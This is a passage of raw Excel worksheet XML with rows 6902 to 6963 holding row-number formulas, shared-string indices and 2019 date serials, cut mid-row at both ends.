      <c r="C6902" t="s">
        <v>9973</v>
      </c>
      <c r="D6902" s="1">
        <v>43755</v>
      </c>
      <c r="E6902" t="s">
        <v>10099</v>
      </c>
      <c r="F6902" t="s">
        <v>9975</v>
      </c>
      <c r="G6902" t="s">
        <v>13606</v>
      </c>
    </row>
    <row r="6903" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6903">
        <f t="shared" si="107"/>
        <v>6902</v>
      </c>
      <c r="B6903">
        <v>1902</v>
      </c>
      <c r="C6903" t="s">
        <v>9973</v>
      </c>
      <c r="D6903" s="1">
        <v>43755</v>
      </c>
      <c r="E6903" t="s">
        <v>10099</v>
      </c>
      <c r="F6903" t="s">
        <v>9975</v>
      </c>
      <c r="G6903" t="s">
        <v>13607</v>
      </c>
    </row>
    <row r="6904" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6904">
        <f t="shared" si="107"/>
        <v>6903</v>
      </c>
      <c r="B6904">
        <v>1903</v>
      </c>
      <c r="C6904" t="s">
        <v>9973</v>
      </c>
      <c r="D6904" s="1">
        <v>43747</v>
      </c>
      <c r="E6904" t="s">
        <v>13608</v>
      </c>
      <c r="F6904" t="s">
        <v>9975</v>
      </c>
      <c r="G6904" t="s">
        <v>13609</v>
      </c>
    </row>
    <row r="6905" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6905">
        <f t="shared" si="107"/>
        <v>6904</v>
      </c>
      <c r="B6905">
        <v>1904</v>
      </c>
      <c r="C6905" t="s">
        <v>9973</v>
      </c>
      <c r="D6905" s="1">
        <v>43755</v>
      </c>
      <c r="E6905" t="s">
        <v>10099</v>
      </c>
      <c r="F6905" t="s">
        <v>9975</v>
      </c>
      <c r="G6905" t="s">
        <v>13610</v>
      </c>
    </row>
    <row r="6906" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6906">
        <f t="shared" si="107"/>
        <v>6905</v>
      </c>
      <c r="B6906">
        <v>1905</v>
      </c>
      <c r="C6906" t="s">
        <v>9973</v>
      </c>
      <c r="D6906" s="1">
        <v>43757</v>
      </c>
      <c r="E6906" t="s">
        <v>13611</v>
      </c>
      <c r="F6906" t="s">
        <v>9975</v>
      </c>
      <c r="G6906" t="s">
        <v>13612</v>
      </c>
    </row>
    <row r="6907" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6907">
        <f t="shared" si="107"/>
        <v>6906</v>
      </c>
      <c r="B6907">
        <v>1906</v>
      </c>
      <c r="C6907" t="s">
        <v>9973</v>
      </c>
      <c r="D6907" s="1">
        <v>43754</v>
      </c>
      <c r="E6907" t="s">
        <v>13613</v>
      </c>
      <c r="F6907" t="s">
        <v>9975</v>
      </c>
      <c r="G6907" t="s">
        <v>13614</v>
      </c>
    </row>
    <row r="6908" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6908">
        <f t="shared" si="107"/>
        <v>6907</v>
      </c>
      <c r="B6908">
        <v>1907</v>
      </c>
      <c r="C6908" t="s">
        <v>9973</v>
      </c>
      <c r="D6908" s="1">
        <v>43755</v>
      </c>
      <c r="E6908" t="s">
        <v>13615</v>
      </c>
      <c r="F6908" t="s">
        <v>9975</v>
      </c>
      <c r="G6908" t="s">
        <v>13616</v>
      </c>
    </row>
    <row r="6909" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6909">
        <f t="shared" si="107"/>
        <v>6908</v>
      </c>
      <c r="B6909">
        <v>1908</v>
      </c>
      <c r="C6909" t="s">
        <v>9973</v>
      </c>
      <c r="D6909" s="1">
        <v>43745</v>
      </c>
      <c r="E6909" t="s">
        <v>13617</v>
      </c>
      <c r="F6909" t="s">
        <v>9975</v>
      </c>
      <c r="G6909" t="s">
        <v>13618</v>
      </c>
    </row>
    <row r="6910" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6910">
        <f t="shared" si="107"/>
        <v>6909</v>
      </c>
      <c r="B6910">
        <v>1909</v>
      </c>
      <c r="C6910" t="s">
        <v>9973</v>
      </c>
      <c r="D6910" s="1">
        <v>43756</v>
      </c>
      <c r="E6910" t="s">
        <v>13619</v>
      </c>
      <c r="F6910" t="s">
        <v>9975</v>
      </c>
      <c r="G6910" t="s">
        <v>13620</v>
      </c>
    </row>
    <row r="6911" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6911">
        <f t="shared" si="107"/>
        <v>6910</v>
      </c>
      <c r="B6911">
        <v>1910</v>
      </c>
      <c r="C6911" t="s">
        <v>9973</v>
      </c>
      <c r="D6911" s="1">
        <v>43750</v>
      </c>
      <c r="E6911" t="s">
        <v>13621</v>
      </c>
      <c r="F6911" t="s">
        <v>9975</v>
      </c>
      <c r="G6911" t="s">
        <v>13622</v>
      </c>
    </row>
    <row r="6912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6912">
        <f t="shared" si="107"/>
        <v>6911</v>
      </c>
      <c r="B6912">
        <v>1911</v>
      </c>
      <c r="C6912" t="s">
        <v>9973</v>
      </c>
      <c r="D6912" s="1">
        <v>43738</v>
      </c>
      <c r="E6912" t="s">
        <v>13623</v>
      </c>
      <c r="F6912" t="s">
        <v>9975</v>
      </c>
      <c r="G6912" t="s">
        <v>13624</v>
      </c>
    </row>
    <row r="6913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6913">
        <f t="shared" si="107"/>
        <v>6912</v>
      </c>
      <c r="B6913">
        <v>1912</v>
      </c>
      <c r="C6913" t="s">
        <v>9973</v>
      </c>
      <c r="D6913" s="1">
        <v>43756</v>
      </c>
      <c r="E6913" t="s">
        <v>10099</v>
      </c>
      <c r="F6913" t="s">
        <v>9975</v>
      </c>
      <c r="G6913" t="s">
        <v>13625</v>
      </c>
    </row>
    <row r="6914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6914">
        <f t="shared" si="107"/>
        <v>6913</v>
      </c>
      <c r="B6914">
        <v>1913</v>
      </c>
      <c r="C6914" t="s">
        <v>9973</v>
      </c>
      <c r="D6914" s="1">
        <v>43753</v>
      </c>
      <c r="E6914" t="s">
        <v>13626</v>
      </c>
      <c r="F6914" t="s">
        <v>9975</v>
      </c>
      <c r="G6914" t="s">
        <v>13627</v>
      </c>
    </row>
    <row r="6915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6915">
        <f t="shared" ref="A6915:A6978" si="108">+ROW(A6914)</f>
        <v>6914</v>
      </c>
      <c r="B6915">
        <v>1914</v>
      </c>
      <c r="C6915" t="s">
        <v>9973</v>
      </c>
      <c r="D6915" s="1">
        <v>43744</v>
      </c>
      <c r="E6915" t="s">
        <v>13628</v>
      </c>
      <c r="F6915" t="s">
        <v>9975</v>
      </c>
      <c r="G6915" t="s">
        <v>13629</v>
      </c>
    </row>
    <row r="6916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6916">
        <f t="shared" si="108"/>
        <v>6915</v>
      </c>
      <c r="B6916">
        <v>1915</v>
      </c>
      <c r="C6916" t="s">
        <v>9973</v>
      </c>
      <c r="D6916" s="1">
        <v>43751</v>
      </c>
      <c r="E6916" t="s">
        <v>13630</v>
      </c>
      <c r="F6916" t="s">
        <v>9975</v>
      </c>
      <c r="G6916" t="s">
        <v>13631</v>
      </c>
    </row>
    <row r="6917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6917">
        <f t="shared" si="108"/>
        <v>6916</v>
      </c>
      <c r="B6917">
        <v>1916</v>
      </c>
      <c r="C6917" t="s">
        <v>9973</v>
      </c>
      <c r="D6917" s="1">
        <v>43746</v>
      </c>
      <c r="E6917" t="s">
        <v>13632</v>
      </c>
      <c r="F6917" t="s">
        <v>9975</v>
      </c>
      <c r="G6917" t="s">
        <v>13633</v>
      </c>
    </row>
    <row r="6918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6918">
        <f t="shared" si="108"/>
        <v>6917</v>
      </c>
      <c r="B6918">
        <v>1917</v>
      </c>
      <c r="C6918" t="s">
        <v>9973</v>
      </c>
      <c r="D6918" s="1">
        <v>43754</v>
      </c>
      <c r="E6918" t="s">
        <v>10099</v>
      </c>
      <c r="F6918" t="s">
        <v>9975</v>
      </c>
      <c r="G6918" t="s">
        <v>13634</v>
      </c>
    </row>
    <row r="6919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6919">
        <f t="shared" si="108"/>
        <v>6918</v>
      </c>
      <c r="B6919">
        <v>1918</v>
      </c>
      <c r="C6919" t="s">
        <v>9973</v>
      </c>
      <c r="D6919" s="1">
        <v>43746</v>
      </c>
      <c r="E6919" t="s">
        <v>13635</v>
      </c>
      <c r="F6919" t="s">
        <v>9975</v>
      </c>
      <c r="G6919" t="s">
        <v>13636</v>
      </c>
    </row>
    <row r="6920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6920">
        <f t="shared" si="108"/>
        <v>6919</v>
      </c>
      <c r="B6920">
        <v>1919</v>
      </c>
      <c r="C6920" t="s">
        <v>9973</v>
      </c>
      <c r="D6920" s="1">
        <v>43752</v>
      </c>
      <c r="E6920" t="s">
        <v>13637</v>
      </c>
      <c r="F6920" t="s">
        <v>9975</v>
      </c>
      <c r="G6920" t="s">
        <v>13638</v>
      </c>
    </row>
    <row r="6921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6921">
        <f t="shared" si="108"/>
        <v>6920</v>
      </c>
      <c r="B6921">
        <v>1920</v>
      </c>
      <c r="C6921" t="s">
        <v>9973</v>
      </c>
      <c r="D6921" s="1">
        <v>43756</v>
      </c>
      <c r="E6921" t="s">
        <v>13639</v>
      </c>
      <c r="F6921" t="s">
        <v>9975</v>
      </c>
      <c r="G6921" t="s">
        <v>13640</v>
      </c>
    </row>
    <row r="6922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6922">
        <f t="shared" si="108"/>
        <v>6921</v>
      </c>
      <c r="B6922">
        <v>1921</v>
      </c>
      <c r="C6922" t="s">
        <v>9973</v>
      </c>
      <c r="D6922" s="1">
        <v>43745</v>
      </c>
      <c r="E6922" t="s">
        <v>13641</v>
      </c>
      <c r="F6922" t="s">
        <v>9975</v>
      </c>
      <c r="G6922" t="s">
        <v>13642</v>
      </c>
    </row>
    <row r="6923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6923">
        <f t="shared" si="108"/>
        <v>6922</v>
      </c>
      <c r="B6923">
        <v>1922</v>
      </c>
      <c r="C6923" t="s">
        <v>9973</v>
      </c>
      <c r="D6923" s="1">
        <v>43741</v>
      </c>
      <c r="E6923" t="s">
        <v>13643</v>
      </c>
      <c r="F6923" t="s">
        <v>9975</v>
      </c>
      <c r="G6923" t="s">
        <v>13644</v>
      </c>
    </row>
    <row r="6924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6924">
        <f t="shared" si="108"/>
        <v>6923</v>
      </c>
      <c r="B6924">
        <v>1923</v>
      </c>
      <c r="C6924" t="s">
        <v>9973</v>
      </c>
      <c r="D6924" s="1">
        <v>43744</v>
      </c>
      <c r="E6924" t="s">
        <v>13645</v>
      </c>
      <c r="F6924" t="s">
        <v>9975</v>
      </c>
      <c r="G6924" t="s">
        <v>13646</v>
      </c>
    </row>
    <row r="6925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6925">
        <f t="shared" si="108"/>
        <v>6924</v>
      </c>
      <c r="B6925">
        <v>1924</v>
      </c>
      <c r="C6925" t="s">
        <v>9973</v>
      </c>
      <c r="D6925" s="1">
        <v>43742</v>
      </c>
      <c r="E6925" t="s">
        <v>13647</v>
      </c>
      <c r="F6925" t="s">
        <v>9975</v>
      </c>
      <c r="G6925" t="s">
        <v>13648</v>
      </c>
    </row>
    <row r="6926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6926">
        <f t="shared" si="108"/>
        <v>6925</v>
      </c>
      <c r="B6926">
        <v>1925</v>
      </c>
      <c r="C6926" t="s">
        <v>9973</v>
      </c>
      <c r="D6926" s="1">
        <v>43752</v>
      </c>
      <c r="E6926" t="s">
        <v>13649</v>
      </c>
      <c r="F6926" t="s">
        <v>9975</v>
      </c>
      <c r="G6926" t="s">
        <v>13650</v>
      </c>
    </row>
    <row r="6927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6927">
        <f t="shared" si="108"/>
        <v>6926</v>
      </c>
      <c r="B6927">
        <v>1926</v>
      </c>
      <c r="C6927" t="s">
        <v>9973</v>
      </c>
      <c r="D6927" s="1">
        <v>43746</v>
      </c>
      <c r="E6927" t="s">
        <v>13651</v>
      </c>
      <c r="F6927" t="s">
        <v>9975</v>
      </c>
      <c r="G6927" t="s">
        <v>13652</v>
      </c>
    </row>
    <row r="6928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6928">
        <f t="shared" si="108"/>
        <v>6927</v>
      </c>
      <c r="B6928">
        <v>1927</v>
      </c>
      <c r="C6928" t="s">
        <v>9973</v>
      </c>
      <c r="D6928" s="1">
        <v>43743</v>
      </c>
      <c r="E6928" t="s">
        <v>13653</v>
      </c>
      <c r="F6928" t="s">
        <v>9975</v>
      </c>
      <c r="G6928" t="s">
        <v>13654</v>
      </c>
    </row>
    <row r="6929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6929">
        <f t="shared" si="108"/>
        <v>6928</v>
      </c>
      <c r="B6929">
        <v>1928</v>
      </c>
      <c r="C6929" t="s">
        <v>9973</v>
      </c>
      <c r="D6929" s="1">
        <v>43739</v>
      </c>
      <c r="E6929" t="s">
        <v>13655</v>
      </c>
      <c r="F6929" t="s">
        <v>9975</v>
      </c>
      <c r="G6929" t="s">
        <v>13656</v>
      </c>
    </row>
    <row r="6930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6930">
        <f t="shared" si="108"/>
        <v>6929</v>
      </c>
      <c r="B6930">
        <v>1929</v>
      </c>
      <c r="C6930" t="s">
        <v>9973</v>
      </c>
      <c r="D6930" s="1">
        <v>43756</v>
      </c>
      <c r="E6930" t="s">
        <v>13657</v>
      </c>
      <c r="F6930" t="s">
        <v>9975</v>
      </c>
      <c r="G6930" t="s">
        <v>13658</v>
      </c>
    </row>
    <row r="6931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6931">
        <f t="shared" si="108"/>
        <v>6930</v>
      </c>
      <c r="B6931">
        <v>1930</v>
      </c>
      <c r="C6931" t="s">
        <v>9973</v>
      </c>
      <c r="D6931" s="1">
        <v>43739</v>
      </c>
      <c r="E6931" t="s">
        <v>13659</v>
      </c>
      <c r="F6931" t="s">
        <v>9975</v>
      </c>
      <c r="G6931" t="s">
        <v>13660</v>
      </c>
    </row>
    <row r="6932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6932">
        <f t="shared" si="108"/>
        <v>6931</v>
      </c>
      <c r="B6932">
        <v>1931</v>
      </c>
      <c r="C6932" t="s">
        <v>9973</v>
      </c>
      <c r="D6932" s="1">
        <v>43739</v>
      </c>
      <c r="E6932" t="s">
        <v>13661</v>
      </c>
      <c r="F6932" t="s">
        <v>9975</v>
      </c>
      <c r="G6932" t="s">
        <v>13662</v>
      </c>
    </row>
    <row r="6933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6933">
        <f t="shared" si="108"/>
        <v>6932</v>
      </c>
      <c r="B6933">
        <v>1932</v>
      </c>
      <c r="C6933" t="s">
        <v>9973</v>
      </c>
      <c r="D6933" s="1">
        <v>43754</v>
      </c>
      <c r="E6933" t="s">
        <v>13663</v>
      </c>
      <c r="F6933" t="s">
        <v>9975</v>
      </c>
      <c r="G6933" t="s">
        <v>13664</v>
      </c>
    </row>
    <row r="6934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6934">
        <f t="shared" si="108"/>
        <v>6933</v>
      </c>
      <c r="B6934">
        <v>1933</v>
      </c>
      <c r="C6934" t="s">
        <v>9973</v>
      </c>
      <c r="D6934" s="1">
        <v>43740</v>
      </c>
      <c r="E6934" t="s">
        <v>13665</v>
      </c>
      <c r="F6934" t="s">
        <v>9975</v>
      </c>
      <c r="G6934" t="s">
        <v>13666</v>
      </c>
    </row>
    <row r="6935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6935">
        <f t="shared" si="108"/>
        <v>6934</v>
      </c>
      <c r="B6935">
        <v>1934</v>
      </c>
      <c r="C6935" t="s">
        <v>9973</v>
      </c>
      <c r="D6935" s="1">
        <v>43747</v>
      </c>
      <c r="E6935" t="s">
        <v>13667</v>
      </c>
      <c r="F6935" t="s">
        <v>10021</v>
      </c>
      <c r="G6935" t="s">
        <v>13668</v>
      </c>
    </row>
    <row r="6936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6936">
        <f t="shared" si="108"/>
        <v>6935</v>
      </c>
      <c r="B6936">
        <v>1935</v>
      </c>
      <c r="C6936" t="s">
        <v>9973</v>
      </c>
      <c r="D6936" s="1">
        <v>43744</v>
      </c>
      <c r="E6936" t="s">
        <v>13669</v>
      </c>
      <c r="F6936" t="s">
        <v>9975</v>
      </c>
      <c r="G6936" t="s">
        <v>13670</v>
      </c>
    </row>
    <row r="6937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6937">
        <f t="shared" si="108"/>
        <v>6936</v>
      </c>
      <c r="B6937">
        <v>1936</v>
      </c>
      <c r="C6937" t="s">
        <v>9973</v>
      </c>
      <c r="D6937" s="1">
        <v>43745</v>
      </c>
      <c r="E6937" t="s">
        <v>13671</v>
      </c>
      <c r="F6937" t="s">
        <v>9975</v>
      </c>
      <c r="G6937" t="s">
        <v>13672</v>
      </c>
    </row>
    <row r="6938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6938">
        <f t="shared" si="108"/>
        <v>6937</v>
      </c>
      <c r="B6938">
        <v>1937</v>
      </c>
      <c r="C6938" t="s">
        <v>9973</v>
      </c>
      <c r="D6938" s="1">
        <v>43745</v>
      </c>
      <c r="E6938" t="s">
        <v>13673</v>
      </c>
      <c r="F6938" t="s">
        <v>9975</v>
      </c>
      <c r="G6938" t="s">
        <v>13674</v>
      </c>
    </row>
    <row r="6939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6939">
        <f t="shared" si="108"/>
        <v>6938</v>
      </c>
      <c r="B6939">
        <v>1938</v>
      </c>
      <c r="C6939" t="s">
        <v>9973</v>
      </c>
      <c r="D6939" s="1">
        <v>43744</v>
      </c>
      <c r="E6939" t="s">
        <v>13675</v>
      </c>
      <c r="F6939" t="s">
        <v>9975</v>
      </c>
      <c r="G6939" t="s">
        <v>13676</v>
      </c>
    </row>
    <row r="6940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6940">
        <f t="shared" si="108"/>
        <v>6939</v>
      </c>
      <c r="B6940">
        <v>1939</v>
      </c>
      <c r="C6940" t="s">
        <v>9973</v>
      </c>
      <c r="D6940" s="1">
        <v>43754</v>
      </c>
      <c r="E6940" t="s">
        <v>13677</v>
      </c>
      <c r="F6940" t="s">
        <v>9975</v>
      </c>
      <c r="G6940" t="s">
        <v>13678</v>
      </c>
    </row>
    <row r="6941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6941">
        <f t="shared" si="108"/>
        <v>6940</v>
      </c>
      <c r="B6941">
        <v>1940</v>
      </c>
      <c r="C6941" t="s">
        <v>9973</v>
      </c>
      <c r="D6941" s="1">
        <v>43746</v>
      </c>
      <c r="E6941" t="s">
        <v>13679</v>
      </c>
      <c r="F6941" t="s">
        <v>9975</v>
      </c>
      <c r="G6941" t="s">
        <v>13680</v>
      </c>
    </row>
    <row r="6942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6942">
        <f t="shared" si="108"/>
        <v>6941</v>
      </c>
      <c r="B6942">
        <v>1941</v>
      </c>
      <c r="C6942" t="s">
        <v>9973</v>
      </c>
      <c r="D6942" s="1">
        <v>43753</v>
      </c>
      <c r="E6942" t="s">
        <v>13681</v>
      </c>
      <c r="F6942" t="s">
        <v>10021</v>
      </c>
      <c r="G6942" t="s">
        <v>13682</v>
      </c>
    </row>
    <row r="6943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6943">
        <f t="shared" si="108"/>
        <v>6942</v>
      </c>
      <c r="B6943">
        <v>1942</v>
      </c>
      <c r="C6943" t="s">
        <v>9973</v>
      </c>
      <c r="D6943" s="1">
        <v>43745</v>
      </c>
      <c r="E6943" t="s">
        <v>13683</v>
      </c>
      <c r="F6943" t="s">
        <v>9975</v>
      </c>
      <c r="G6943" t="s">
        <v>13684</v>
      </c>
    </row>
    <row r="6944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6944">
        <f t="shared" si="108"/>
        <v>6943</v>
      </c>
      <c r="B6944">
        <v>1943</v>
      </c>
      <c r="C6944" t="s">
        <v>9973</v>
      </c>
      <c r="D6944" s="1">
        <v>43743</v>
      </c>
      <c r="E6944" t="s">
        <v>13685</v>
      </c>
      <c r="F6944" t="s">
        <v>9975</v>
      </c>
      <c r="G6944" t="s">
        <v>13686</v>
      </c>
    </row>
    <row r="6945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6945">
        <f t="shared" si="108"/>
        <v>6944</v>
      </c>
      <c r="B6945">
        <v>1944</v>
      </c>
      <c r="C6945" t="s">
        <v>9973</v>
      </c>
      <c r="D6945" s="1">
        <v>43754</v>
      </c>
      <c r="E6945" t="s">
        <v>13687</v>
      </c>
      <c r="F6945" t="s">
        <v>10021</v>
      </c>
      <c r="G6945" t="s">
        <v>13688</v>
      </c>
    </row>
    <row r="6946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6946">
        <f t="shared" si="108"/>
        <v>6945</v>
      </c>
      <c r="B6946">
        <v>1945</v>
      </c>
      <c r="C6946" t="s">
        <v>9973</v>
      </c>
      <c r="D6946" s="1">
        <v>43746</v>
      </c>
      <c r="E6946" t="s">
        <v>13689</v>
      </c>
      <c r="F6946" t="s">
        <v>9975</v>
      </c>
      <c r="G6946" t="s">
        <v>13690</v>
      </c>
    </row>
    <row r="6947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6947">
        <f t="shared" si="108"/>
        <v>6946</v>
      </c>
      <c r="B6947">
        <v>1946</v>
      </c>
      <c r="C6947" t="s">
        <v>9973</v>
      </c>
      <c r="D6947" s="1">
        <v>43750</v>
      </c>
      <c r="E6947" t="s">
        <v>13691</v>
      </c>
      <c r="F6947" t="s">
        <v>9975</v>
      </c>
      <c r="G6947" t="s">
        <v>13692</v>
      </c>
    </row>
    <row r="6948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6948">
        <f t="shared" si="108"/>
        <v>6947</v>
      </c>
      <c r="B6948">
        <v>1947</v>
      </c>
      <c r="C6948" t="s">
        <v>9973</v>
      </c>
      <c r="D6948" s="1">
        <v>43746</v>
      </c>
      <c r="E6948" t="s">
        <v>13693</v>
      </c>
      <c r="F6948" t="s">
        <v>9975</v>
      </c>
      <c r="G6948" t="s">
        <v>13694</v>
      </c>
    </row>
    <row r="6949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6949">
        <f t="shared" si="108"/>
        <v>6948</v>
      </c>
      <c r="B6949">
        <v>1948</v>
      </c>
      <c r="C6949" t="s">
        <v>9973</v>
      </c>
      <c r="D6949" s="1">
        <v>43752</v>
      </c>
      <c r="E6949" t="s">
        <v>13695</v>
      </c>
      <c r="F6949" t="s">
        <v>9975</v>
      </c>
      <c r="G6949" t="s">
        <v>13696</v>
      </c>
    </row>
    <row r="6950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6950">
        <f t="shared" si="108"/>
        <v>6949</v>
      </c>
      <c r="B6950">
        <v>1949</v>
      </c>
      <c r="C6950" t="s">
        <v>9973</v>
      </c>
      <c r="D6950" s="1">
        <v>43739</v>
      </c>
      <c r="E6950" t="s">
        <v>13697</v>
      </c>
      <c r="F6950" t="s">
        <v>10021</v>
      </c>
      <c r="G6950" t="s">
        <v>13698</v>
      </c>
    </row>
    <row r="6951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6951">
        <f t="shared" si="108"/>
        <v>6950</v>
      </c>
      <c r="B6951">
        <v>1950</v>
      </c>
      <c r="C6951" t="s">
        <v>9973</v>
      </c>
      <c r="D6951" s="1">
        <v>43749</v>
      </c>
      <c r="E6951" t="s">
        <v>13699</v>
      </c>
      <c r="F6951" t="s">
        <v>9975</v>
      </c>
      <c r="G6951" t="s">
        <v>13700</v>
      </c>
    </row>
    <row r="6952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6952">
        <f t="shared" si="108"/>
        <v>6951</v>
      </c>
      <c r="B6952">
        <v>1951</v>
      </c>
      <c r="C6952" t="s">
        <v>9973</v>
      </c>
      <c r="D6952" s="1">
        <v>43750</v>
      </c>
      <c r="E6952" t="s">
        <v>13701</v>
      </c>
      <c r="F6952" t="s">
        <v>9975</v>
      </c>
      <c r="G6952" t="s">
        <v>13702</v>
      </c>
    </row>
    <row r="6953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6953">
        <f t="shared" si="108"/>
        <v>6952</v>
      </c>
      <c r="B6953">
        <v>1952</v>
      </c>
      <c r="C6953" t="s">
        <v>9973</v>
      </c>
      <c r="D6953" s="1">
        <v>43753</v>
      </c>
      <c r="E6953" t="s">
        <v>13703</v>
      </c>
      <c r="F6953" t="s">
        <v>10021</v>
      </c>
      <c r="G6953" t="s">
        <v>13704</v>
      </c>
    </row>
    <row r="6954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6954">
        <f t="shared" si="108"/>
        <v>6953</v>
      </c>
      <c r="B6954">
        <v>1953</v>
      </c>
      <c r="C6954" t="s">
        <v>9973</v>
      </c>
      <c r="D6954" s="1">
        <v>43744</v>
      </c>
      <c r="E6954" t="s">
        <v>13705</v>
      </c>
      <c r="F6954" t="s">
        <v>9975</v>
      </c>
      <c r="G6954" t="s">
        <v>13706</v>
      </c>
    </row>
    <row r="6955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6955">
        <f t="shared" si="108"/>
        <v>6954</v>
      </c>
      <c r="B6955">
        <v>1954</v>
      </c>
      <c r="C6955" t="s">
        <v>9973</v>
      </c>
      <c r="D6955" s="1">
        <v>43741</v>
      </c>
      <c r="E6955" t="s">
        <v>13707</v>
      </c>
      <c r="F6955" t="s">
        <v>9975</v>
      </c>
      <c r="G6955" t="s">
        <v>13708</v>
      </c>
    </row>
    <row r="6956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6956">
        <f t="shared" si="108"/>
        <v>6955</v>
      </c>
      <c r="B6956">
        <v>1955</v>
      </c>
      <c r="C6956" t="s">
        <v>9973</v>
      </c>
      <c r="D6956" s="1">
        <v>43738</v>
      </c>
      <c r="E6956" t="s">
        <v>13709</v>
      </c>
      <c r="F6956" t="s">
        <v>9975</v>
      </c>
      <c r="G6956" t="s">
        <v>13710</v>
      </c>
    </row>
    <row r="6957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6957">
        <f t="shared" si="108"/>
        <v>6956</v>
      </c>
      <c r="B6957">
        <v>1956</v>
      </c>
      <c r="C6957" t="s">
        <v>9973</v>
      </c>
      <c r="D6957" s="1">
        <v>43750</v>
      </c>
      <c r="E6957" t="s">
        <v>13711</v>
      </c>
      <c r="F6957" t="s">
        <v>9975</v>
      </c>
      <c r="G6957" t="s">
        <v>13712</v>
      </c>
    </row>
    <row r="6958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6958">
        <f t="shared" si="108"/>
        <v>6957</v>
      </c>
      <c r="B6958">
        <v>1957</v>
      </c>
      <c r="C6958" t="s">
        <v>9973</v>
      </c>
      <c r="D6958" s="1">
        <v>43743</v>
      </c>
      <c r="E6958" t="s">
        <v>13713</v>
      </c>
      <c r="F6958" t="s">
        <v>9975</v>
      </c>
      <c r="G6958" t="s">
        <v>13714</v>
      </c>
    </row>
    <row r="6959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6959">
        <f t="shared" si="108"/>
        <v>6958</v>
      </c>
      <c r="B6959">
        <v>1958</v>
      </c>
      <c r="C6959" t="s">
        <v>9973</v>
      </c>
      <c r="D6959" s="1">
        <v>43750</v>
      </c>
      <c r="E6959" t="s">
        <v>13715</v>
      </c>
      <c r="F6959" t="s">
        <v>9975</v>
      </c>
      <c r="G6959" t="s">
        <v>13716</v>
      </c>
    </row>
    <row r="6960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6960">
        <f t="shared" si="108"/>
        <v>6959</v>
      </c>
      <c r="B6960">
        <v>1959</v>
      </c>
      <c r="C6960" t="s">
        <v>9973</v>
      </c>
      <c r="D6960" s="1">
        <v>43739</v>
      </c>
      <c r="E6960" t="s">
        <v>13717</v>
      </c>
      <c r="F6960" t="s">
        <v>9975</v>
      </c>
      <c r="G6960" t="s">
        <v>13718</v>
      </c>
    </row>
    <row r="6961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6961">
        <f t="shared" si="108"/>
        <v>6960</v>
      </c>
      <c r="B6961">
        <v>1960</v>
      </c>
      <c r="C6961" t="s">
        <v>9973</v>
      </c>
      <c r="D6961" s="1">
        <v>43751</v>
      </c>
      <c r="E6961" t="s">
        <v>13719</v>
      </c>
      <c r="F6961" t="s">
        <v>9975</v>
      </c>
      <c r="G6961" t="s">
        <v>13720</v>
      </c>
    </row>
    <row r="6962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6962">
        <f t="shared" si="108"/>
        <v>6961</v>
      </c>
      <c r="B6962">
        <v>1961</v>
      </c>
      <c r="C6962" t="s">
        <v>9973</v>
      </c>
      <c r="D6962" s="1">
        <v>43751</v>
      </c>
      <c r="E6962" t="s">
        <v>13721</v>
      </c>
      <c r="F6962" t="s">
        <v>9975</v>
      </c>
      <c r="G6962" t="s">
        <v>13722</v>
      </c>
    </row>
    <row r="6963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A6963">
        <f t="shared" si="108"/>
        <v>6962</v>
